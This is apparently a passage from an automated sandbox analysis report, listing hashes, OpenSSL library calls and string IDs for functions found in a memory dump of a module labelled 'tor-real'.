                                                                            • Opcode Fuzzy Hash: b5ac01d01eaba8f65d11d127ba4baf612cb274de50bb68763eba03954c72cbe3
                                                                            • Instruction Fuzzy Hash: 23F037B16483009FC7009FA4E081B6EBBF4BF84308F418A0DE889ABA20C731E4588B06
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_error
                                                                            • String ID: A
                                                                            • API String ID: 1631441854-3554254475
                                                                            • Opcode ID: 437ad7e784d5ff5e980da6d196f62bd8776900cf52e7ecd3d20345b9c66e9a00
                                                                            • Instruction ID: 622f3aca3d0e96c4a9970cae41e3c57d0364cf73717bc952c578fbba9d81fcaf
                                                                            • Opcode Fuzzy Hash: 437ad7e784d5ff5e980da6d196f62bd8776900cf52e7ecd3d20345b9c66e9a00
                                                                            • Instruction Fuzzy Hash: 7AF0AEB1008705EED3019FA0C58535EBBE0AF84348F218C0CE2D89B761CBB994899B4A
                                                                            APIs
                                                                            • CRYPTO_THREAD_write_lock.LIBCRYPTO-1_1 ref: 6C0BCC80
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0BCC8F
                                                                            • OPENSSL_LH_delete.LIBCRYPTO-1_1 ref: 6C0BCCAA
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BCD34
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BCDA0
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0BCDCA
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlock$D_write_lockH_deleteH_retrieve__stack_chk_fail
                                                                            • String ID:
                                                                            • API String ID: 987486398-0
                                                                            • Opcode ID: c0d510953f04040aaa718dcc6b181d8d69f21b33f5a59f26385d23c82dcc23c6
                                                                            • Instruction ID: 2f461fe403eee7bd2f538a6436f1254b364676dde76f714fcef2548cdfae30d6
                                                                            • Opcode Fuzzy Hash: c0d510953f04040aaa718dcc6b181d8d69f21b33f5a59f26385d23c82dcc23c6
                                                                            • Instruction Fuzzy Hash: 5531F674A0A7018FDB44DF25C584B9ABBE0BF88708F1549ADE899AB750D731E940CF42
                                                                            APIs
                                                                            • CRYPTO_THREAD_write_lock.LIBCRYPTO-1_1 ref: 6C0BC6C9
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0BC6D8
                                                                            • OPENSSL_LH_delete.LIBCRYPTO-1_1 ref: 6C0BC6EF
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC753
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC7BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlock$D_write_lockH_deleteH_retrieve
                                                                            • String ID:
                                                                            • API String ID: 3617886225-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$O_strdupstrlen
                                                                            • String ID:
                                                                            • API String ID: 3235580710-0
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4CBA
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B4CC5
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4CDD
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B4D09
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free
                                                                            • String ID:
                                                                            • API String ID: 3920316597-0
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC5C1
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC5E0
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0AC5F3
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC60B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$L_sk_pop_free
                                                                            • String ID:
                                                                            • API String ID: 1650471521-0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: D$P
                                                                            • API String ID: 2581946324-307317852
                                                                            APIs
                                                                            • CRYPTO_memcmp.LIBCRYPTO-1_1 ref: 6C0C2A77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_memcmp
                                                                            • String ID: *$D
                                                                            • API String ID: 2788248766-1254260235
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096471
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09648C
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: J
                                                                            • API String ID: 2581946324-1141589763
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0964C9
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0964E4
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: Q
                                                                            • API String ID: 2581946324-3463352047
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096521
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09653C
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: X
                                                                            • API String ID: 2581946324-3081909835
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0DEEF6
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DEF7F
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0DF9F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_clear_freeR_put_errorY_free__stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 304499002-450215437
                                                                            • Opcode ID: ee331ccf3628db1d97e4ff00e432c5812387b5455de9a3da29ec27e73aec4a4b
                                                                            • Instruction ID: 1d4d9b47c9e19f86bf9ce70a46b06d524328a332aa1238b952c3b12e012938c7
                                                                            • Opcode Fuzzy Hash: ee331ccf3628db1d97e4ff00e432c5812387b5455de9a3da29ec27e73aec4a4b
                                                                            • Instruction Fuzzy Hash: 8401E5B1108B40CFD310DF25C488B6ABBE0BF88319F51896DE4A85B761C779A4498F46
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09A963
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A985
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_malloc
                                                                            • String ID: w
                                                                            • API String ID: 2609694610-476252946
                                                                            • Opcode ID: 66d3de9a77b8e84e488c8116259aaa5d0d3e27d259a399fdef3e373822786e22
                                                                            • Instruction ID: ecd78c91b7f13356c39ab3439dccc297a44a5d705e9238ccf9b0556c7a830de6
                                                                            • Opcode Fuzzy Hash: 66d3de9a77b8e84e488c8116259aaa5d0d3e27d259a399fdef3e373822786e22
                                                                            • Instruction Fuzzy Hash: CEF0BDB1409B019FE7409F14D49435ABBE0FF40748F15C92CD89C5F751C77AA499CB81
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0AA027
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0AA065
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_mallocR_put_error
                                                                            • String ID: A
                                                                            • API String ID: 2513334388-3554254475
                                                                            • Opcode ID: c1e3da3cbacb05f57ab386771c8424aaaae60f9b1c0be6eea7b50adeae59272c
                                                                            • Instruction ID: 9be90a7cd62ffa84e32564fa3179d37c7e05c61a7d9d63e516dcafb6b27bceed
                                                                            • Opcode Fuzzy Hash: c1e3da3cbacb05f57ab386771c8424aaaae60f9b1c0be6eea7b50adeae59272c
                                                                            • Instruction Fuzzy Hash: F2F01CB22483069FD7009F94D40438EBBE0FB80748F00892CE9D85B751D7BA95898B82
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2A9F
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B2AB9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeR_put_error
                                                                            • String ID: A
                                                                            • API String ID: 3735976985-3554254475
                                                                            • Opcode ID: dd185dce889ef5237f1fd411a348ac6ded939241f08c631489e55043bcd2f5cb
                                                                            • Instruction ID: d91aecacd17d5300f30c670ca5932cb2302466b4fd5f7e48979b32c167b9a799
                                                                            • Opcode Fuzzy Hash: dd185dce889ef5237f1fd411a348ac6ded939241f08c631489e55043bcd2f5cb
                                                                            • Instruction Fuzzy Hash: AEE0E5B220D3019FE3109F94E48539EFBE0BB85348F10892DE2D85B650C7B995888B86
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09672F
                                                                              • Part of subcall function 6C095930: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09594A
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096917
                                                                              • Part of subcall function 6C09A800: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A875
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0968D2
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0968EA
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096986
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09699E
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$O_malloc
                                                                            • String ID:
                                                                            • API String ID: 2767441526-0
                                                                            • Opcode ID: ba75865c12dd505295bda479c1d8534c22de76da2a11706f2eb53980b3dd2085
                                                                            • Instruction ID: 9a50a4dca25eadd30f330727cffd098b44e9c4647d6bc1453f69818e1bbe60b7
                                                                            • Opcode Fuzzy Hash: ba75865c12dd505295bda479c1d8534c22de76da2a11706f2eb53980b3dd2085
                                                                            • Instruction Fuzzy Hash: F551E0B0505B09CFE750DF29C180796FBE0BF88308F508A2DD9AA8B752DB71A954CF85
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_realloc$R_put_errormemset
                                                                            • String ID:
                                                                            • API String ID: 3557331458-0
                                                                            • Opcode ID: 7c64b4f2aafdc40b744eca7cb6bc43bdfb5ebd4a81d13092a154894006e61daa
                                                                            • Instruction ID: a4776e1d141068625183326dd3ac6d3b97247316999e6712cc9817a9296686d4
                                                                            • Opcode Fuzzy Hash: 7c64b4f2aafdc40b744eca7cb6bc43bdfb5ebd4a81d13092a154894006e61daa
                                                                            • Instruction Fuzzy Hash: 1C31D2B55093429FC740CF55C08479ABBE1BFC8344F559A2EE8A89B351D730E546CF92
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4C7B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4C83
                                                                            • BUF_reverse.LIBCRYPTO-1_1 ref: 6C0D4EC3
                                                                              • Part of subcall function 6C095630: CRYPTO_zalloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,6C0DD604), ref: 6C095661
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4E3B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4E43
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeX_free$F_reverseO_zalloc
                                                                            • String ID:
                                                                            • API String ID: 463408481-0
                                                                            • Opcode ID: 8d58cc86a176305f9e3363f5837ec77830f00b96dba09bda3766e4ca56db1d3b
                                                                            • Instruction ID: 6cdf415971dc6665ffa0f3c6462114a8d6a13ab092e08dbfb66def2dd6a09c0d
                                                                            • Opcode Fuzzy Hash: 8d58cc86a176305f9e3363f5837ec77830f00b96dba09bda3766e4ca56db1d3b
                                                                            • Instruction Fuzzy Hash: E711BDB16087009FD310DF69D080B6EBBE0AF89318F51CA2DE09DAB650D735E9859B82
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$__stack_chk_failmemcmp
                                                                            • String ID:
                                                                            • API String ID: 2806090773-0
                                                                            • Opcode ID: 17907bd8b5b02a4e81d4586c30a433a0f4f839e9a5378b395f98bcfc8d4d41a4
                                                                            • Instruction ID: 4c47285fe4bb6186cca9d6008f347e479170ba1bcd992f6debbe12f816d1da29
                                                                            • Opcode Fuzzy Hash: 17907bd8b5b02a4e81d4586c30a433a0f4f839e9a5378b395f98bcfc8d4d41a4
                                                                            • Instruction Fuzzy Hash: 92F0B7B1A093019FC700DFD4D48465EFBE0BF89744F418C1DE4989B710C735D4898B46
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AA433
                                                                            • CRYPTO_mem_ctrl.LIBCRYPTO-1_1 ref: 6C0AA43F
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0AA46B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_mem_ctrlR_put_error
                                                                            • String ID:
                                                                            • API String ID: 4239609840-0
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0DEEF6
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0DF9F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_clear_freeR_put_error__stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 3211164415-450215437
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0C245D
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0C2591
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0C259B
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0C266B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free__stack_chk_fail
                                                                            • String ID: P
                                                                            • API String ID: 28610519-3110715001
                                                                            APIs
                                                                              • Part of subcall function 6C095A50: CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,6C0963B8), ref: 6C095A6A
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096606
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: 8
                                                                            • API String ID: 2581946324-4194326291
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0CE189
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0CE8C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeR_put_error__stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 1428589374-450215437
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,6C097BA6,?,?,?,?,?,?,?,?,?,00000000), ref: 6C09AB89
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: 7
                                                                            • API String ID: 2581946324-1790921346
                                                                            APIs
                                                                              • Part of subcall function 6C0EA0C0: SRP_Verify_B_mod_N.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA0DE
                                                                              • Part of subcall function 6C0EA0C0: SRP_Calc_u.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA108
                                                                              • Part of subcall function 6C0EA0C0: SRP_Calc_x.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA155
                                                                              • Part of subcall function 6C0EA0C0: SRP_Calc_client_key.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA199
                                                                              • Part of subcall function 6C0EA0C0: BN_num_bits.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA1AB
                                                                              • Part of subcall function 6C0EA0C0: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0EA1D3
                                                                              • Part of subcall function 6C0EA0C0: BN_bn2bin.LIBCRYPTO-1_1 ref: 6C0EA1EB
                                                                              • Part of subcall function 6C0EA0C0: BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA215
                                                                              • Part of subcall function 6C0EA0C0: BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA221
                                                                              • Part of subcall function 6C0EA0C0: strlen.MSVCRT ref: 6C0EA229
                                                                              • Part of subcall function 6C0EA0C0: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0EA245
                                                                              • Part of subcall function 6C0EA0C0: BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA24D
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0D050D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_clear_free$O_clear_free$B_mod_Calc_client_keyCalc_uCalc_xN_bn2binN_num_bitsO_mallocVerify_strlen
                                                                            • String ID: j
                                                                            • API String ID: 127021746-2692410735
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: !
                                                                            • API String ID: 2581946324-2657877971
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: u
                                                                            • API String ID: 2581946324-4067256894
                                                                            • Opcode ID: 00612eefd328989a6c9036572a168ff3b0ed55be3acae4712e7b4e46af73a5c9
                                                                            • Instruction ID: 098dc63794e16d72141c92f779a85882c435c0acaebbb21edab1551de045fe9a
                                                                            • Opcode Fuzzy Hash: 00612eefd328989a6c9036572a168ff3b0ed55be3acae4712e7b4e46af73a5c9
                                                                            • Instruction Fuzzy Hash: 4DD05E704483049BC300EF54C8C124E7BE0BF48349F80891CDCC86F311D738A0458B52
                                                                            APIs
                                                                            • CRYPTO_strdup.LIBCRYPTO-1_1 ref: 6C0A0D50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_strdup
                                                                            • String ID: 8
                                                                            • API String ID: 1296259186-687329977
                                                                            • Opcode ID: e547303031716d10cf88b43d276a38cc6bb9763047204bf50c8b9c45dffecaf7
                                                                            • Instruction ID: 8670946d1ccac4b98bfe7e4b1012ff8b6cdb6a4d7a75faafd25212a0453dd168
                                                                            • Opcode Fuzzy Hash: e547303031716d10cf88b43d276a38cc6bb9763047204bf50c8b9c45dffecaf7
                                                                            • Instruction Fuzzy Hash: BBD0C9758087009FC700EF28C04961ABBE0BF89308FC5889CE88C57711D334A5599F53
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AAE19
                                                                            • CRYPTO_strdup.LIBCRYPTO-1_1 ref: 6C0AAE31
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_strdup
                                                                            • String ID:
                                                                            • API String ID: 2148955802-0
                                                                            • Opcode ID: f9aab7eeadd0eb91c0fafb3a8a77a4ca0ab27301151977ccee81ebd3417e06a7
                                                                            • Instruction ID: c215ad71bcc6f9d5ef1d4465bc39494b2b43182d7098093de919b816236d3b4c
                                                                            • Opcode Fuzzy Hash: f9aab7eeadd0eb91c0fafb3a8a77a4ca0ab27301151977ccee81ebd3417e06a7
                                                                            • Instruction Fuzzy Hash: D6218371A053018FDB04DF69D48079BB7E1BF84318F65859CDC859B74AD735E842CB91
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4B16
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4B8D
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4C0D
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E4C57
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$O_mallocR_put_error
                                                                            • String ID:
                                                                            • API String ID: 2563039504-0
                                                                            • Opcode ID: 63b6637ea6085c64c23d7409244ec8063d3ea8712ecfc4a7eb3428b7e531a665
                                                                            • Instruction ID: d58c1a06fb7e7fb3cb07112de9894673dd074586bb457c9080705d21dccbec08
